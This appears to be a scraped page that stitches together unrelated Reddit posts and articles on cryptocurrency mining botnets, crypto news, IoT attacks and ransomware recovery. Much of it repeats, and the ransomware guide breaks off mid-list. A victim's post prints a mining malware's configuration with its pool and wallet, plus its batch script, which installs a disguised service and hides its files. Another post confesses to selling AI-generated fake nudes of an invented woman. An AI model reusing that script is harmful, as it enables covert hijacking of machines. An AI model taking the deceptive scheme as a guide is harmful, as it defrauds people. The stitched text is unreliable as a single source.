Botcoin: Bitcoin Mining by Botnet — Krebs on Security

Multi Mining

This subreddit is dedicated to profit based coin mining pools.
[link]

Symantec takes down 500k bots of botnet used for bitcoin mining

Symantec takes down 500k bots of botnet used for bitcoin mining submitted by leepfrog to Bitcoin [link] [comments]

Free to play takes an evil turn: Using gamers as a botnet to mine for bitcoins

Free to play takes an evil turn: Using gamers as a botnet to mine for bitcoins submitted by eobet to gaming [link] [comments]

August / September monthly report from v1docq47 (CCS + XRM.RU)

This is my monthly progress report (CCS.html) + XMR.RU).
Below is a list of what has been done and translated into Russian for two months of my work.

Monero Video (YouTube)

The following video posted on Monero Russian Community YouTube Channel.

Weekly News:

Short Q&A about Monero:

Monero into Russian (Translation)

The following articles / guides have been translated into Russian and posted on the XMR.RU website and my Github repository.
Note: If you would like to read the original article in English, then, open the article you are interested in, and at the end of each article you will find a link to the source.

Critical Decentralisation Cluster 36c3 (transcriptions (EN + RU) + translation (RU)):

01 - Monero Introduction (Diego "rehrar" Salazar) | Transcriptions - EN.md) / RU.md) / XMR.RU 02 - RIAT Introduction (parasew) | Transcriptions - EN.md) / RU.md) / XMR.RU 03 - Swiss Cryptoeconomics Assembly (polto, Ome) | Transcriptions - EN.md) / RU.md) / XMR.RU 04 - Namecoin Introduction (Jeremy Rand) | Transcriptions - EN.md) / RU.md) / XMR.RU 05 - Open Hardware developed at FOSSASIA (Mario Behling) | Transcriptions - EN.md) / RU.md) / XMR.RU 06 - Paralelni Polis (Juraj Bednar) | Transcriptions - EN.md) / RU.md) / XMR.RU 07 - Introduction to Replicant (dllud, Denis ‘GNUtoo’ Carikli)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 08 - Open Source Hardware and OSHWA (Drew Fustini) | Transcriptions - EN.md) / RU.md) / XMR.RU 09 - ImplicitCAD (Juila Longtin) | Transcriptions - EN.md) / RU.md) / XMR.RU 10 - Program in Detail | Transcriptions - EN / RU / XMR.RU 11 - about:freedom (Bonnie Mehring, Blipp)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 13 - Funding Models of FOSS (Diego “rehrar” Salazar) | Transcriptions - EN.md) / RU.md) / XMR.RU 14 - The Sharp Forks We Follow​ | Transcriptions - EN / RU / XMR.RU 16 - P2P Trading in Cryptoanarchy | Transcriptions - EN / RU / XMR.RU 17 - Monero’s Adaptive Blockweight Approach to Scaling | Transcriptions - EN / RU / XMR.RU 18 - Nym (Harry Halpin)​ | Transcriptions - EN.md) / RU.md) / XMR.RU 19 - Digital Integrity of the Human Person | Transcriptions - EN / RU / XMR.RU 20 - cyber~Congress (Sergey Simanovsky) | Transcriptions - EN.md) / RU.md) / XMR.RU 21 - KYC & Crypto-AML Tools (polto) | Transcriptions - EN.md) / RU.md) / XMR.RU 22 - Parallel Polis, Temporary Autonomous Zones and Beyond | Transcriptions - EN / RU 23 - MandelBot:HAB - Open Source Ecotecture and Horizontalism | Transcriptions - EN / RU 24 - Adventures and Experiments Adding Namecoin to Tor Browser | Transcriptions - EN / RU 25 - Fair Data Society (Gregor Zavcer) | Transcriptions - EN.md) / RU.md) / XMR.RU 45 - Designing a Communal Computing Interface | Transcriptions - EN / RU / XMR.RU 47 - Hackatoshi’s Flying Circuit | Transcriptions - EN / RU / XMR.RU

Zero to Monero - Second Edition

https://www.overleaf.com/read/hcmqnvgtfmyh - Chapter 00 - Abstract - Chapter 01 - Introduction - Chapter 02 - Basic Concepts - Chapter 03 - Advanced Schnorr-like Signatures

Monero Outreach Articles

Getmonero.org Posts Blog

LocalMonero Articles

Note: You need "Change Language" to Russian - Why Monero Has A Tail Emission - How CLSAG Will Improve Monero's Efficiency - How Monero Solved the Block Size Problem That Plagues Bitcoin - How Ring Signatures Obscure Monero's Outputs - Monero Best Practices for Beginners - Monero Outputs Explained

Monero Meeting logs

CCS Result / Report

Monero News

Other Articles

Pull / Merge Request

Monero Project Translations (Weblate)

Thanks for your support!
submitted by v1docq47 to Monero [link] [comments]

Heres some proof about sigma not being a trojan and omikron client proof from the sigma creator andro

The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher.
And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc
Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft).
Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares.
Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/

And Omikron client was not a bitcoin miner, here's the copypasta :
Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy.
But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.
Edit, another copypasta:
I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this usepass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.
The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended.

Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).
submitted by Vardenisss to minecraftclients [link] [comments]

Crypto Weekly News

What important crypto events happened last week?
Cryptocurrencies
Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.
Projects and Updates
Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.
Regulations
New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.
Hacking
Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).
Mass adoption
Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.
People
Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to CryptoCurrencies [link] [comments]

Crypto Weekly News — September, 18

What important crypto events happened last week?

Cryptocurrencies

Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.

Projects and Updates

Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.

Regulations

New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.

Hacking

Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).

Mass adoption

Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.

People

Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to u/CoinjoyAssistant [link] [comments]

Crypto Weekly News

What important crypto events happened last week?
Cryptocurrencies
Monero Presents New Legal Framework In Defense Of Privacy Coins
Riccardo Spagni presented the result of more than a year's work. A whitepaper titled "Anti-Money Laundering Regulation of Privacy-Enabling Cryptocurrencies" has been published. The document was conceived as a new legal framework to protect confidential coins such as Monero, Zcash, Dash, Komodo, and others.
Tether Is Moving 1 Billion More USDT Coins From TRON To Ethereum Blockchain
The total supply of coins will not change. The company carried out the swap on September 15, coordinating its actions "with a third party". In recent weeks, this is the second such stablecoin transfer between blockchains — on August 20, the issuer also moved USDT 1 billion from Tron to Ethereum. Another piece of news about Tether: USDT capitalization exceeded $15 billion, having increased by $3 billion in just a month.
Projects and Updates
Kraken Receives Licence To Establish First U.S Digital Assets Bank
The Kraken Bitcoin exchange was the first in the United States to receive the status of a special purpose depository institution (SPDI), giving it the functions of a traditional financial institution. The corresponding application of the Californian company was approved by the Wyoming Banking Council. This will allow Kraken to opt-out of third-party vendors to perform certain banking functions on its own.
Official Ethereum Proof-of-Stake Algorithm Proposal Published
Ethereum Foundation Lead Developer Danny Ryan has published the official proposal EIP-2982, which suggests the launch of Ethereum 2.0 and the transition from the Proof-of-Work consensus algorithm to Proof-of-Stake. If approved by other leading developers, it will be possible to launch Serenity, Ethereum 2.0 phase zero. Within its framework, the Beacon Chain will be activated, which will use Proof-of-Stake.
Uniswap Provides All Its Users With $1.200
Leading decentralized exchange (DEX) Uniswap has released the UNI governance token. It was listed on the Binance exchange almost immediately. About 13000 Uniswap users have already requested tokens.
Regulations
New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.
Hacking
Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).
Mass adoption
Bahamas Geared to Launch Central Bank Digital Currency
The Bahamas wants to be the first country in the world to roll out a government-backed virtual currency nationwide and announced they will launch a central bank-issued cryptocurrency (CBDC) in October. The digital currency, dubbed "sand dollar", is designed to increase the financial availability of remote islands within the archipelago state.
Alibaba On Track To Be The Largest Blockchain Patent Holder By End Of 2020
Computer giant IBM risks losing the title of the largest blockchain patent holder to the Chinese corporation Alibaba. Since the beginning of the year, Alibaba has published ten times more patents than its closest competitor, IBM. According to analysts, if the pace is maintained, the Chinese corporation will become the largest patent holder by the end of the year.
France Begins Central Bank Digital Currency Testing
Société Générale — one of the largest financial conglomerates in Europe — will test the central bank digital currency (CBDC) on the Tezos blockchain. The Bank of France, as a result of the selection of partners, chose the Forge blockchain platform to test CBDC for interbank settlements. As part of the experiment, the feasibility of digitizing financial securities and the possibility of settlements on them using CBDC will be studied. In addition to Nomadic Labs, several technology service providers and consultants will participate in the testing.
Kazakhstan Will Develop A Blockchain Service For Ensuring The Security Of Personal Data
It will allow citizens of the country to control the use of their personal data. The service is planned to be introduced by the end of this year.
People
Kiss Rock Group Member Is Ready To Buy Bitcoin
Gene Simmons supported Cameron Winklevoss's request to use bank accounts to buy Bitcoin and Ether. The co-founder of Gemini tweeted that people who do not have access to banking services find it difficult to become the owners of cryptocurrency and that they need to take advantage of the benefits. The musician commented as follows: "I will. I am." For this moment, the most common opinion on Twitter is that Simmons is already buying cryptocurrency and will continue to increase the amount of Bitcoin he owns.
That’s all for now! For more details follow us on Twitter, subscribe to our YouTube channel, join our Telegram.
submitted by CoinjoyAssistant to cryptoeconomynet [link] [comments]

IoT Attacks, Hacker Motivations, and Recommended Countermeasures

IoT Attacks, Hacker Motivations, and Recommended Countermeasures


Illustration: © IoT For All
Businesses worldwide spent $1.5 billion on IoT security in 2019. When it comes to connecting devices via cellular IoT, the selling-point is typically the data and derived insights–this is where the customer sees real value, more so than in any security benefits. That said, IoT solution providers not taking security measures into consideration are risking significant revenue and reputation loss in the event of a security breach–both for their own business as well as their customer’s business.
In the worst cases, the harm done from one security breach will far outweigh any previously created customer value. IoT connectivity providers that can explain and demonstrate their security concepts will gain a competitive advantage.

Why Are Hackers Focused on IoT?

IoT attacks increased by 900% in 2019. So, why are hackers increasingly targeting IoT devices? There are several explanations:
  1. Lack of security software on the devices: Opposed to regular computers, IoT devices do not have a firewall or virus scanner.
  2. Less experienced device producers: The businesses usually come from the industry vertical and often are lacking the IT security expertise of servecomputer manufacturers.
  3. Multiple devices with the same security mechanisms: Once an attack works with one device it will work with thousands.
  4. IoT devices are out of reach: device owners deploy their machines remotely. Often an owner won’t realize that the devices have been compromised until it is too late. Once an attacker has control over a device, it could run all day long before being physically shut down by the owner.

Who Are the Attackers and What Motivates Them?

  • Amateur hackers and script kiddies – usually their objective is fame among their peers, either by targeting a high-profile victim or by demonstrating an ability to infect many devices in a single attack.
  • Governments/Intelligence organizations – acting in the safety of their citizens, intelligence agencies attempt to secure access to important information.
  • Political interest groups – they attack organizations that they think are morally corrupt. Examples are groups like anonymous.
  • Criminal businesses – organizations that take advantage of vulnerabilities within the target to generate revenue for themselves.
The criminal businesses mentioned above are typically set up as ordinary businesses and are especially relevant in the IoT domain. Their objective is to gain control over a large number of IoT devices and make money out of them, often in one of the following ways:
  • Selling Distributed Denial of Service attacks – like webstresser.org (more information via Forbes)
  • Using devices for Bitcoin mining (more information via CNBC)
  • Blocking the device operation until the owner pays a ransom (ransomware)

How Do IoT Attacks Work?

Mirai

The most common IoT attack today is the Mirai malware, which originated in 2016. The malware scans the public internet for IoT devices and tries to establish a remote telnet connection using a list of common factory default usernames and passwords. As soon as one device is infected, the malware begins scanning for more victims. All devices become part of the Mirai botnet which is then steered through the attacker’s command and control center. The attackers then execute a DDoS attack, on behalf of their customers, to a target destination in order to take down the servers of the victims.

Stuxnet

The Stuxnet computer worm was first uncovered in 2010. The malware first injects Microsoft Windows machines exploiting zero-day exploit or outdated OS versions; initially it spread over USB flash drives. On the Windows machine it looks for the Siemens Step7 software that controls the Siemens programmable logic controller (PLC). With the Step7 software it then installs itself on the IoT device and takes over control. Stuxnet once targeted Iranian facilities and reportedly severely harmed the Iranian atomic program.

Silex/Brickerbot

While Brickerbot was discovered in 2017 and Silex appeared in 2019, they have a common attack pattern. Like Mirai, the software scans the public internet and tries to log in to the IoT device with default and weak login and password combinations. After infection, the software overwrites all data and deletes the network configuration, which makes the IoT device unusable, unless someone can physically get a hand on the device.

Countermeasures to Guard Against Attacks

As seen in the Stuxnet attack, IoT devices in the same network as other machines can be impacted by the vulnerabilities of those other machines. To avoid this, using a dedicated network infrastructure is recommended, instead of using shared LAN or Wi-Fi networks. Alternatively, using cellular communication that separates the communication of the different machines is also preferred.
The Mirai and Silex / Brickerbot malware show the value of having random and unique log-in credentials for the different devices – this could have prevented the above-mentioned attack. While the devices allowed for remote access by their owners, the access was granted via the unsecured public internet. A more secure way to get remote access to IoT devices is to use IPSec or Intra-Cloud Connect, avoiding the exposure of public Internet.
One way to prevent attempts to steal remote access to IoT devices, as well as completely block attacks, is to use a cellular firewall. With a cellular firewall, devices are only permitted to communicate with a defined subset of IP addresses. The firewall itself is not located on the individual devices, rather on the cellular connection – out of the attacker’s control.

Key Takeaway: Security First

While the excitement surrounding the brimming potential of IoT connectivity is understandable–and warranted–overlooking IoT device security can prove catastrophic. A robustly secured IoT solution is one that can safely scale globally, enable groundbreaking solutions, and last for years to come.
Originally published by EMnify -| August 12, 2020 iot for all
submitted by kjonesatjaagnet to JAAGNet [link] [comments]

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

using AI in unethical ways

Hello, before I start spilling the beans let me give some background about myself. Since I was a little child my fascination on the topic of electricity and computing was immeasurable. This was not enough to be considered good at anything, everyone including myself viewed me as a failure, and I can't blame them, I didn't do any sports or had good grades. But one summer, it was about 5 years ago I have started exploring computer science, on my own. And my skills were improving really fast, but my family's constant disappointment pushed me away from anything, since my programs weren't good grades, and fuck me that I don't have good grades. This pushed me into a great depression, an insane one where I didn't felt like waking up anymore, except one day when I found out about artificial intelligence, and it's potential. At first it was just a hobby I kept secret from everyone since I don't want to let anyone know anything about me since I will be critiqued, but this hobby of mine turned into an obsession. Any money I could earn would go into video cards and any free time I had would go towards researching different AI's. My room turned into GPUs and wires. Electricity bill was getting out of hand with each day, this issue won't continue for long since I discovered an website named "this person doesn't exist", that site gave me an idea, one of the worst kinds, but quite profitable in money.
To reach that idea I have done a lot of research on genetic algorithms, deep learning, machine learning. This research gave birth to some new learning algorithms, and all of them combined let me virtual humans. At first I could get a realistic face, but it was not enough to reach my goal. I needed something to let me create poses at demand, this part took 6 months out of my life, nights I haven't slept, constant headaches and insane anxiety, not knowing if each attempt will work, all I could do is to wait until it fully trained on my dateset(who is just insane to gather enough data, and process them manually).
My nightmare ended with one algorithm who took a long time to adapt itself, but it showed potential. I wasn't deceived it kept working really well. But let's not forget why I wanted to make something that let me create a persona and pose it however I wanted, to pay my electricity bills and buy new upgrades for my botnet. So I opened an Instagram page, where I would impersonate a girl named Casey(not the name I had actually used, but I still want to keep this dirty business). She would put some provocative pictures of herself. It wasn't long until Casey(I don't identify as her, she is only an internet personality, I think) was asked for nudes so I agreed to sell them and get paid through bitcoin, my program could generate nudity with ease since all I had to do was to find what parameters influenced her clothing .
The sad part of my story is that I'm using others to live a lazy life. If you are wondering why don't I sell me work, or why don't I work in this domain officially and so on, the answer is simple, I don't have a college done, I need to work hard to gain less than I do from exploiting some horny people and I get to work on my latest project who is not related to any AI, a compiler. It might get me closer to self programming AI if I use an genetic algorithm on it. Don't expect any replies from me, since this is the first time and the last I'm logging on this account, and I hope my English didn't bothered you, it was built by many hours of playing games, farewell.
submitted by AIThrowAwayAcc to offmychest [link] [comments]

How Ransomware Encryption Happens & 4 Methods for Recovery

We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover their data and decrypt their data.
Evaluating all options will include analyzing the encrypted files, and the least desirable option to pay the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have.
By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.

You’re the victim of a ransomware attack

You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.

3 Common Ways Your Files Were Encrypted or Locked

Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:

Open Remote Desktop Protocol Ports (RDP)

